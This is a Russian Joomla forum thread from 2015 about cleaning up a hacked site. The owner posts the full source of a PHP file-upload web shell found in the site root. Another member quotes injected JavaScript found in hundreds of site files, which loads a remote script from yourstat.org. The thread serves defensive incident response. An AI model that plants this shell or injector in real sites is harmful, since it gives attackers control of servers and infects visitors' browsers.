0 Пользователей и 1 Гость просматривают эту тему.
  • 45 Ответов
  • 1752 Просмотров
*

Serebro2009

  • Осваиваюсь на форуме
  • 109
  • 0
Никто не сталкивался? Сайт взломали, случайно обнаружил файл (krd.html) в корне следующего содержания:

HaCkeD By MuhmadEmad
Long Live to peshmarga
kurdlinux007@gmail.com
*** ISIS !

Может кто знает как бороться? 
Joomla стоит 3.4.7

Так же в корне еще находится файл (apis.php) сожержание:

<?
error_reporting(0);
if(isset($_GET[sdbu]))
   {
      echo"<font color=#FFFFFF>[uname]".php_uname()."[/uname]<br>";
      echo "<font color=#FFFFFF>[pwd]".getcwd()."[/pwd]<br>";
      print "\n";$disable_functions = @ini_get("disable_functions");
      echo "DisablePHP=".$disable_functions; print "<br>";
      echo"<form method=post enctype=multipart/form-data>";
      echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";
        if($_POST["v"]==up)
{ if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){echo"<b>berhasil</b>-->".$_FILES["f"]["name"];}else{echo"<b>gagal";}} 
{ if(@copy($_FILES["emad"]["tmp_name"],$_FILES["emad"]["name"])){echo"<b></b>-->".$_FILES["emad"]["name"];}else{echo"<b>";}}}
?>
*

wishlight

  • Профи
  • 3640
  • 223
  • skype aqaus.com
*

winstrool

  • Завсегдатай
  • 774
  • 42
  • Свободен для работы
Joomla стоит 3.4.7
Бывает, что шелы на сайтах месяцами-годами лежат, а юзаются по мере необходимости, эта ветка версии недавно с фиксами вышла, шелы наверняка уже до нее были, более того, на сегодняшний день уже есть https://www.joomla.org/announcements/release-news/5644-joomla-3-4-8-released.html - Joomla 3.4.8
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям
*

Serebro2009

  • Осваиваюсь на форуме
  • 109
  • 0
http://joomlaforum.ru/index.php/board,104.0.html в основном разделе полно рекомендаций. Советую воспользоватся сканером ai-bolit поле обновления всего, что возможно на сайте.
Сканировал ai-bolit'ом еще до установки различных модулей...отсылал результат Земскову - ответил, что все Ок


елы на сайтах месяцами-годами лежат, а юзаются по мере необходимости, эта ветка версии недавно с фиксами вышла, шелы наверняка уже до нее были, более того, на сегодняшний день уже есть https://www.joomla.org/announcements/release-news/5644-joomla-3-4-8-released.html - Joomla 3.4.8

Угу, обновляюсь
*

winstrool

  • Завсегдатай
  • 774
  • 42
  • Свободен для работы
Сканировал ai-bolit'ом еще до установки различных модулей...отсылал результат Земскову - ответил, что все Ок
ai-bolit - это одно из решений к комплексному подходу, второй момент просто также шелл не оказался же.... может это и просто в качестве бегдора лежал, но еще не использовался, в любом случае имеет смысл подумать по усилению защиты сайта, дабы избежать подобных рисков заражения.
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям
*

12mv

  • Завсегдатай
  • 526
  • 20
  • Гульсина
Мне так кажется, что простого обновления не достаточно. Нужно вылечить сайт, а потом уже обновлять.
скачайте сайт на комп и  поиском по файлам в нотепаде ищите упоминания о подозрительных строчках, чистите и заливайте обратно сайт. В каждой папке нужно проверить и сравнить с дистрибьютором на наличие лишних/подозрительных и сносить. А потом уже обновлять на чистом сайте.
Я свой так и вылечила на 1.5 когда то) Айболитом мне ничего не показывало, а Яндекс и Google заблочили, пришлось самой копать.
*

Serebro2009

  • Осваиваюсь на форуме
  • 109
  • 0
ai-bolit - это одно из решений к комплексному подходу, второй момент просто также шелл не оказался же.... может это и просто в качестве бегдора лежал, но еще не использовался, в любом случае имеет смысл подумать по усилению защиты сайта, дабы избежать подобных рисков заражения.
Спасибо, сканирую повторно

>>Мне так кажется, что простого обновления не достаточно. Нужно вылечить сайт, а потом уже обновлять.
Как бы, не могу понять от чего лечить. файлы шелла - удалил. В корне и в папке tmp.
Меня больше интересует, а как можно проанализировать, может это брутфорс? Как-то можно отследить количество попыток ввода пароля для ftp?
*

Serebro2009

  • Осваиваюсь на форуме
  • 109
  • 0
В папке log, есть файл error.php В нем 20 тысяч запросов вида:

2015-11-17T05:55:13+00:00   INFO 46.161.3.92   joomlafailure   Имя пользователя и пароль не совпадают или у вас ещё нет учётной записи на сайте
2015-11-17T05:55:19+00:00   INFO 46.161.3.92   joomlafailure   Имя пользователя и пароль не совпадают или у вас ещё нет учётной записи на сайте
2015-11-17T05:55:24+00:00   INFO 46.161.3.92   joomlafailure   Имя пользователя и пароль не совпадают или у вас ещё нет учётной записи на сайте
2015-11-17T05:55:28+00:00   INFO 46.161.3.92   joomlafailure   Имя пользователя и пароль не совпадают или у вас ещё нет учётной записи на сайте
*

SeBun

  • Практически профи
  • 3166
  • 194
  • @SeBun48
В папке log, есть файл error.php В нем 20 тысяч запросов вида:

2015-11-17T05:55:13+00:00   INFO 46.161.3.92   joomlafailure   Имя пользователя и пароль не совпадают или у вас ещё нет учётной записи на сайте
Похоже на брут.
Оказываю услуги по Joomla | Миграция на Joomla 3.x | Сопровождение | IT-аутсорсинг
*

winstrool

  • Завсегдатай
  • 774
  • 42
  • Свободен для работы
Да, там ведутся записи, о не верной аутентификации, админку нужно дополнительно защищать!
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям
*

Serebro2009

  • Осваиваюсь на форуме
  • 109
  • 0
Первая запись от 04.11 последняя от 29.12...вчера и обнаружил файл. Это чего, меня пытались взломать полтора месяца?)
*

12mv

  • Завсегдатай
  • 526
  • 20
  • Гульсина
Как бы, не могу понять от чего лечить. файлы шелла - удалил. В корне и в папке tmp.
Меня больше интересует, а как можно проанализировать, может это брутфорс? Как-то можно отследить количество попыток ввода пароля для ftp?

Определить можно по лог файлам, с каких IP заходили, учше попросить хостеров чтобы вытащили.

Простого удаления сторонних файлов не достаточно, нужно так же вычистить и файлы в которые был добавлен код.
В моём случае, были заражены js файлы ( 749  файлов)

во всех файлах этих был код:

Код
function g(){var r=new RegExp("(?:; )?1=([^;]*);?");return r.test(document.cookie)?true:false}var e=new Date();e.setTime(e.getTime()+(2592000000));
if(!g()&&window.navigator.cookieEnabled){document.cookie="1=1;expires="+e.toGMTString()+";path=/";document.write('<scr'+'ipt src="http://yourstat.org/yourstat.php"></scr'+'ipt>');}

Все зараженные файлы я тут нашла: http://antivirus-alarm.ru/
После чистки и перепроверки, показало что всё чисто, Яндекс и Google разбанили тоже.
*

SeBun

  • Практически профи
  • 3166
  • 194
  • @SeBun48
Определить можно по лог файлам, с каких IP заходили...
Что бы понять, как действует взломщик, нужно самому быть немного хакером и знать механизмы получения доступа к сайту, а их довольно много. Логи при этом могут не всегда вестись. Например, если выполняется SQL-инъект.
Оказываю услуги по Joomla | Миграция на Joomla 3.x | Сопровождение | IT-аутсорсинг
*

Serebro2009

  • Осваиваюсь на форуме
  • 109
  • 0
Проверил http://antivirus-alarm.ru/ пока все чисто.
Модификации файлов, можно отследить по их последнему изменению?
*

Serebro2009

  • Осваиваюсь на форуме
  • 109
  • 0
Что бы понять, как действует взломщик, нужно самому быть немного хакером и знать механизмы получения доступа к сайту, а их довольно много. Логи при этом могут не всегда вестись. Например, если выполняется SQL-инъект.
Я пока смотрю...в сторону плагинов которые помогут отследить это
*

winstrool

  • Завсегдатай
  • 774
  • 42
  • Свободен для работы
Проверил http://antivirus-alarm.ru/ пока все чисто.
Модификации файлов, можно отследить по их последнему изменению?
Если взломщик не менял то да, но опытные меняют, у файлов есть три атрибута даты, дата создания, дата изминения и дата доступа(вроде так...), вы в своих панелях, как правило, видите только дату изменения, которую можно поправить функцией touch();

Чтобы вообще понять некоторые аспекты уязвимости сайтов и серваков, залейте сами к себе на сайт WSO shell (как пример) и по изучайте возможности того, чего вы сможете сделать если вы внутри, и что вам вообще нужно сделать чтоб избежать этого, по изучайте различные варианты бегдоров, посмотрите как они работают, попробуйте написать свои варианты, это вам поможет понять общею философию сего дела.
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям
*

12mv

  • Завсегдатай
  • 526
  • 20
  • Гульсина
Мне тут видео скинули, как шелл заливают. Руки бы оторвала.

*

SeBun

  • Практически профи
  • 3166
  • 194
  • @SeBun48
Мне тут видео скинули, как шелл заливают. Руки бы оторвала.
Нужно не руки отрывать, а учиться элементарным правилам безопасности. Почитайте...
Оказываю услуги по Joomla | Миграция на Joomla 3.x | Сопровождение | IT-аутсорсинг
*

winstrool

  • Завсегдатай
  • 774
  • 42
  • Свободен для работы
Мне тут видео скинули, как шелл заливают. Руки бы оторвала.


... да на твоем видео еще и ядро рутабельное, что может привести к рууту всего хостинга!...

Отрывай  :laugh: :laugh: :laugh:
https://forum.antichat.ru/threads/398859/

P.S: Меня честно иногда удивляет, когда люди лезут в защиту и лечения сайтов, не понимая техник, методик взлома и троянизации систем.
« Последнее редактирование: 30.12.2015, 11:43:44 от winstrool »
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям
*

Serebro2009

  • Осваиваюсь на форуме
  • 109
  • 0
В соседней ветке есть цитата:

Цитировать
В логах нашел записи
86.123.69.119 - - [17/Dec/2015:10:30:37 +0300] "GET / HTTP/1.1" 200 32849 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0"
86.123.69.119 - - [17/Dec/2015:10:30:39 +0300] "GET / HTTP/1.1" 200 35301 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0"
86.123.69.119 - - [17/Dec/2015:10:30:40 +0300] "GET /config.php HTTP/1.1" 200 170 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0"

Данные логи нужно просить у хостера?
*

winstrool

  • Завсегдатай
  • 774
  • 42
  • Свободен для работы
Все проси, все пригодятся, если умеешь анализировать, а если нет, то толку не будет...
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям
*

Serebro2009

  • Осваиваюсь на форуме
  • 109
  • 0
Теперь нужно и пароль к базе данных менять. Это можно сделать в фале configuration.php?
*

winstrool

  • Завсегдатай
  • 774
  • 42
  • Свободен для работы
Теперь нужно и пароль к базе данных менять. Это можно сделать в фале configuration.php?
Сначала в центральной панели хостинга, а потом в configuration.php
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям
*

wishlight

  • Профи
  • 3640
  • 223
  • skype aqaus.com
Там данные доступа меняются. А сам пароль через панель управления или консоль. Если вы уже сменили пароль к пользователю базы данных, то да в configuration.php пишутся новые данные.
*

12mv

  • Завсегдатай
  • 526
  • 20
  • Гульсина
Теперь нужно и пароль к базе данных менять. Это можно сделать в фале configuration.php?

И не только там, знаю дурная привычка, ftp оставлять, поработал, удалить доступ.
*

Serebro2009

  • Осваиваюсь на форуме
  • 109
  • 0
Сменил через консоль а :) configuration.php не дает редактировать по ftp) Где меняются привилегии?
*

Serebro2009

  • Осваиваюсь на форуме
  • 109
  • 0
Ага все изменил...) спасибо
*

flyingspook

  • Moderator
  • 3620
  • 236
Папку администратора закройте, если еще не закрыли, с помощью http авторизации
*

Serebro2009

  • Осваиваюсь на форуме
  • 109
  • 0
Ага, читаю как сделать это. Спасибо за совет
*

flyingspook

  • Moderator
  • 3620
  • 236
Ага, читаю как сделать это. Спасибо за совет
на хостинге в менеджере файлов или еще где есть сейчас практически везде "ограничения на папку" называется, там указываете папку и логин и пас для пользователя вписываете и автоматом все нужные файлы создаются
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Обновился phpmailer. Сам? Взломали?

Автор master-smeta

Ответов: 58
Просмотров: 2376
Последний ответ 06.09.2017, 14:49:53
от flyingspook
Взломали?

Автор borro

Ответов: 28
Просмотров: 258
Последний ответ 30.08.2017, 12:59:19
от Missile
В корне сайта появляется файл с именем ".bt" (без ковычек)

Автор maestra

Ответов: 24
Просмотров: 2229
Последний ответ 26.07.2017, 12:09:01
от winstrool
На протяжении месяца постоянно взламывают сайт

Автор kaaaaaljan

Ответов: 4
Просмотров: 374
Последний ответ 17.07.2017, 21:36:10
от Sulpher
Скрипт для поиска вирусов и вредоносных скриптов на сайте "AI-Bolit"

Автор revisium

Ответов: 99
Просмотров: 46771
Последний ответ 05.07.2017, 15:18:57
от revisium